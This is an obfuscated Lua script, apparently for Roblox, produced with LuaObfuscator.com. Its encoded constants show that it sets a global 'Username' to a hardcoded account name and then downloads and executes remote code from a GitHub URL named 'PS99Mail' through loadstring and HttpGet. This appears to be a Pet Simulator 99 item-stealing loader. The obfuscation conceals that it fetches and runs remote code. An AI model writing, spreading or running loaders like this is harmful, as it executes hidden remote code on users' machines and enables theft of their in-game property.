--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=(0 + 0) -0 ;local v33;local v34;while true do if (v32==(2 -1)) then return (v34 * (732 -476)) + v33 ;end if (v32==(568 -(367 + 201))) then v33,v34=v1(v16,v19,v19 + (929 -(214 + 713)) );v19=v19 + 1 + 1 ;v32=1 -0 ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=878 -(282 + 595) ;local v38=(v21(v36,1638 -(1523 + (358 -244)) ,18 + 2 ) * (((20 -(10 + 8)) -0)^(24 + 8))) + v35 ;local v39=v21(v36,(4177 -3091) -((216 -148) + 997) ,1301 -(226 + 449 + 595) );local v40=((v21(v36,984 -(802 + 150) )==(4 -(4 -1))) and  -(1 -0)) or (1 + 0) ;if (v39==(117 -(32 + 85))) then if (v38==((438 -(145 + 293)) + 0)) then return v40 * (0 + 0) ;else v39=1 + 0 ;v37=(1617 -(44 + 386)) -((2555 -(998 + 488)) + 118) ;end elseif (v39==2047) then return ((v38==(957 -(892 + 65))) and (v40 * ((2 -1)/(0 -0)))) or (v40 * NaN) ;end return v8(v40,v39-(1877 -854) ) * (v37 + (v38/((352 -(87 + 263))^((1285 -(416 + 26)) -(368 + 423))))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==0) then return "";end end v42=v3(v16,v19,(v19 + v41) -(1 + 0) );v19=v19 + v41 ;local v43={};for v67=1 + 0 , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1467 -(899 + 568) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44~=(0 + 0)) then else v45=0 -0 ;v46=nil;v44=1;end if ((606 -(268 + 335))~=v44) then else v51=nil;while true do local v75=290 -(60 + 230) ;local v76;while true do if (v75==(238 -(64 + 174))) then v76=0 + 0 ;while true do if (v76==0) then local v99=0;while true do if (v99==(573 -(426 + 146))) then v76=1 + 0 ;break;end if (v99~=0) then else if (v45==(1456 -(282 + 1174))) then local v150=336 -(144 + 192) ;local v151;while true do if (v150==0) then v151=0;while true do if (v151~=0) then else local v177=216 -(42 + 174) ;while true do if (v177~=1) then else v151=1 + 0 ;break;end if (v177~=(811 -(569 + 242))) then else v46={};v47={};v177=1 + 0 ;end end end if ((2 -1)==v151) then v48={};v45=1 + 0 ;break;end end break;end end end if (v45~=(1027 -(706 + 318))) then else for v155=1505 -(363 + 1141) ,v24() do v47[v155-1 ]=v29();end return v49;end v99=1581 -(1183 + 397) ;end end end if ((2 -1)~=v76) then else if (v45~=1) then else v49={v46,v47,nil,v48};v50=v24();v51={};v45=2;end if ((2 + 0)==v45) then local v106=0;while true do if (v106==(0 + 0)) then for v157=701 -(271 + 429) ,v50 do local v158=0 + 0 ;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=(2 -1)) then else v161=nil;v162=nil;v158=2;end if (v158==(1933 -(565 + 1368))) then v159=0 + 0 ;v160=nil;v158=1501 -(1408 + 92) ;end if ((7 -5)==v158) then v163=nil;while true do if (v159~=(1662 -(1477 + 184))) then else local v178=1086 -(461 + 625) ;while true do if ((1288 -(993 + 295))~=v178) then else v162=nil;v163=nil;v178=1 + 0 ;end if ((1 + 0)~=v178) then else v159=858 -(564 + 292) ;break;end end end if (v159==(1171 -(418 + 753))) then v160=0;v161=nil;v159=2 -1 ;end if (v159~=2) then else while true do if (v160~=(0 + 0)) then else local v180=0;while true do if (v180==0) then v161=0 + 0 ;v162=nil;v180=1 + 0 ;end if (v180==(1 + 0)) then v160=1 + 0 ;break;end end end if (v160==1) then v163=nil;while true do if (v161==(529 -(406 + 123))) then local v187=0;local v188;while true do if ((1001 -(938 + 63))~=v187) then else v188=1769 -(1749 + 20) ;while true do if (v188~=(1 + 0)) then else v161=1126 -(936 + 189) ;break;end if (v188==(1322 -(1249 + 73))) then local v193=0 + 0 ;while true do if (v193~=1) then else v188=1614 -(1565 + 48) ;break;end if (v193~=0) then else v162=v22();v163=nil;v193=1 + 0 ;end end end end break;end end end if (v161==(1139 -(782 + 356))) then if (v162==1) then v163=v22()~=0 ;elseif (v162==(269 -(176 + 91))) then v163=v25();elseif (v162==(7 -4)) then v163=v26();end v51[v157]=v163;break;end end break;end end break;end end break;end end end v49[1148 -(466 + 679) ]=v22();v106=2 -1 ;end if (v106==(2 -1)) then for v164=1093 -(975 + 117) ,v24() do local v165=1875 -(157 + 1718) ;local v166;local v167;local v168;while true do if (v165==(1900 -(106 + 1794))) then v166=0;v167=nil;v165=1 + 0 ;end if (v165==(1 + 0)) then v168=nil;while true do if ((2 -1)==v166) then while true do if (0~=v167) then else v168=v22();if (v21(v168,1,1)~=(0 -0)) then else local v181=1018 -(697 + 321) ;local v182;local v183;local v184;local v185;local v186;while true do if (2==v181) then v186=nil;while true do if (v182==(2 -1)) then local v190=0 -0 ;local v191;while true do if (v190==0) then v191=0 -0 ;while true do if (v191==(114 -(4 + 110))) then local v203=0;while true do if ((585 -(57 + 527))==v203) then v191=1428 -(41 + 1386) ;break;end if ((0 -0)==v203) then v185=nil;v186=nil;v203=1228 -(322 + 905) ;end end end if (v191~=(104 -(17 + 86))) then else v182=1191 -(449 + 740) ;break;end end break;end end end if (v182==(0 + 0)) then local v192=872 -(826 + 46) ;while true do if (v192==(0 -0)) then v183=947 -(245 + 702) ;v184=nil;v192=3 -2 ;end if (v192==(2 -1)) then v182=1;break;end end end if (v182==2) then while true do if ((1900 -(260 + 1638))==v183) then local v194=166 -(122 + 44) ;local v195;while true do if (v194==(0 -0)) then v195=0;while true do if (v195==0) then local v204=0 -0 ;local v205;while true do if ((0 + 0)==v204) then v205=0 + 0 ;while true do if (v205~=(1 + 0)) then else v195=1 -0 ;break;end if (v205==(0 -0)) then local v209=0;while true do if (v209==(1206 -(902 + 303))) then v205=66 -(30 + 35) ;break;end if (v209==(0 + 0)) then if (v21(v185,1258 -(1043 + 214) ,1 -0 )~=(3 -2)) then else v186[2]=v51[v186[1 + 1 ]];end if (v21(v185,2,1214 -(323 + 889) )==(2 -1)) then v186[583 -(361 + 219) ]=v51[v186[323 -(53 + 267) ]];end v209=684 -(483 + 200) ;end end end end break;end end end if (v195~=(1 + 0)) then else v183=8 -5 ;break;end end break;end end end if (v183~=(416 -(15 + 398))) then else if (v21(v185,3 -0 ,768 -(468 + 297) )==(563 -(334 + 228))) then v186[4]=v51[v186[986 -(18 + 964) ]];end v46[v164]=v186;break;end if (v183==(0 -0)) then local v197=0 -0 ;local v198;while true do if (0==v197) then v198=0 + 0 ;while true do if ((0 + 0)==v198) then local v206=0 + 0 ;while true do if (v206~=0) then else v184=v21(v168,2,3 + 0 );v185=v21(v168,9 -5 ,856 -(20 + 830) );v206=1 + 0 ;end if (v206~=(127 -(116 + 10))) then else v198=1 + 0 ;break;end end end if (v198==(739 -(542 + 196))) then v183=1 -0 ;break;end end break;end end end if (v183~=(1 + 0)) then else local v199=0 + 0 ;local v200;while true do if (0~=v199) then else v200=0 + 0 ;while true do if (v200~=(0 + 0)) then else local v207=0 -0 ;local v208;while true do if (v207~=0) then else v208=0 -0 ;while true do if (v208~=(163 -(92 + 71))) then else local v210=0;while true do if ((1551 -(1126 + 425))==v210) then v186={v23(),v23(),nil,nil};if (v184==(405 -(118 + 287))) then local v215=0 -0 ;local v216;while true do if (v215~=(0 -0)) then else v216=1121 -(118 + 1003) ;while true do if (v216==(0 -0)) then v186[380 -(142 + 235) ]=v23();v186[18 -14 ]=v23();break;end end break;end end elseif (v184==(1 -0)) then v186[1 + 2 ]=v24();elseif (v184==(5 -3)) then v186[980 -(553 + 424) ]=v24() -(2^(29 -13)) ;elseif (v184~=(4 -1)) then else local v221=939 -(714 + 225) ;local v222;local v223;while true do if (v221==1) then while true do if (v222==0) then v223=0 + 0 ;while true do if (v223==(0 + 0)) then v186[3]=v24() -((2 + 0)^(7 + 9)) ;v186[3 + 1 ]=v23();break;end end break;end end break;end if (v221==(806 -(118 + 688))) then v222=0 -0 ;v223=nil;v221=1;end end end v210=1;end if (v210~=1) then else v208=1;break;end end end if (v208~=(2 -1)) then else v200=2 -1 ;break;end end break;end end end if (v200==(1 + 0)) then v183=9 -7 ;break;end end break;end end end end break;end end break;end if (v181~=(754 -(239 + 514))) then else v184=nil;v185=nil;v181=99 -(11 + 86) ;end if (v181==0) then v182=0;v183=nil;v181=2 -1 ;end end end break;end end break;end if (v166~=(0 + 0)) then else local v179=1329 -(797 + 532) ;while true do if (v179~=(0 + 0)) then else v167=1796 -(503 + 1293) ;v168=nil;v179=1 + 0 ;end if (v179==(1 + 0)) then v166=1;break;end end end end break;end end end v45=6 -3 ;break;end end end break;end end break;end end end break;end if (v44~=(1204 -(373 + 829))) then else v49=nil;v50=nil;v44=3;end if (v44==(732 -(476 + 255))) then v47=nil;v48=nil;v44=1132 -(369 + 761) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v69=v2(v0(v52,16));if v20 then local v77=v5(v69,v20);v20=nil;return v77;else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 2 + (735 -(711 + 22)) ;return (v56 * 16777216) + (v55 * (59078 + 6458)) + (v54 * (789 -(43 + 490))) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v78=v61;local v79=v62;local v80=v63;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=5) then if (v91<=2) then if (v91<=0) then v88[v90[2]]();elseif (v91==1) then local v107=v90[2];local v108=v88[v90[3]];v88[v107 + 1 ]=v108;v88[v107]=v108[v90[4]];else do return;end end elseif (v91<=3) then local v100=0;local v101;local v102;local v103;local v104;local v105;while true do if (v100==0) then v101=nil;v102,v103=nil;v104=nil;v105=nil;v59[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v100=1;end if (v100==4) then v83=(v103 + v105) -1 ;v101=0;for v153=v105,v83 do local v154=0;while true do if (v154==0) then v101=v101 + 1 ;v88[v153]=v102[v101];break;end end end v82=v82 + 1 ;v90=v78[v82];v105=v90[2];v100=5;end if (v100==6) then v82=v90[3];break;end if (v100==5) then v88[v105]=v88[v105](v13(v88,v105 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v100=6;end if (v100==3) then v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v105=v90[2];v102,v103=v81(v88[v105](v13(v88,v105 + 1 ,v90[3])));v100=4;end if (v100==1) then v90=v78[v82];if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v59;else v88[v90[2]]=v59[v90[3]];end v82=v82 + 1 ;v90=v78[v82];if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v59;else v88[v90[2]]=v59[v90[3]];end v82=v82 + 1 ;v100=2;end if (v100==2) then v90=v78[v82];v105=v90[2];v104=v88[v90[3]];v88[v105 + 1 ]=v104;v88[v105]=v104[v90[4]];v82=v82 + 1 ;v100=3;end end elseif (v91==4) then v59[v90[3]]=v88[v90[2]];else for v145=v90[2],v90[3] do v88[v145]=nil;end end elseif (v91<=8) then if (v91<=6) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==7) then v82=v90[3];else local v116=v90[2];v88[v116]=v88[v116](v13(v88,v116 + 1 ,v83));end elseif (v91<=9) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v59;else v88[v90[2]]=v59[v90[3]];end elseif (v91==10) then local v121=v90[2];local v122,v123=v81(v88[v121](v13(v88,v121 + 1 ,v90[3])));v83=(v123 + v121) -1 ;local v124=0;for v147=v121,v83 do v124=v124 + 1 ;v88[v147]=v122[v124];end else v88[v90[2]]=v90[3];end v82=v82 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v70=(v64/(2^(v65-(3 -2))))%((861 -(240 + 619))^(((v66-1) -(v65-(1 + 0))) + (1 -0))) ;return v70-(v70%1) ;else local v71=(1 + 1)^(v65-(1745 -(720 + 624 + 400))) ;return (((v64%(v71 + v71))>=v71) and (406 -(255 + 150))) or ((0 -0) + 0) ;end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D6503073O0070756C626F3132030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120B3O00014O0005000100013O0026063O0002000100010004073O0002000100120B000100013O00260600010005000100010004073O0005000100120B000200033O001203000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004073O000500010004073O001400010004073O000200012O00023O00017O00",v9(),...);
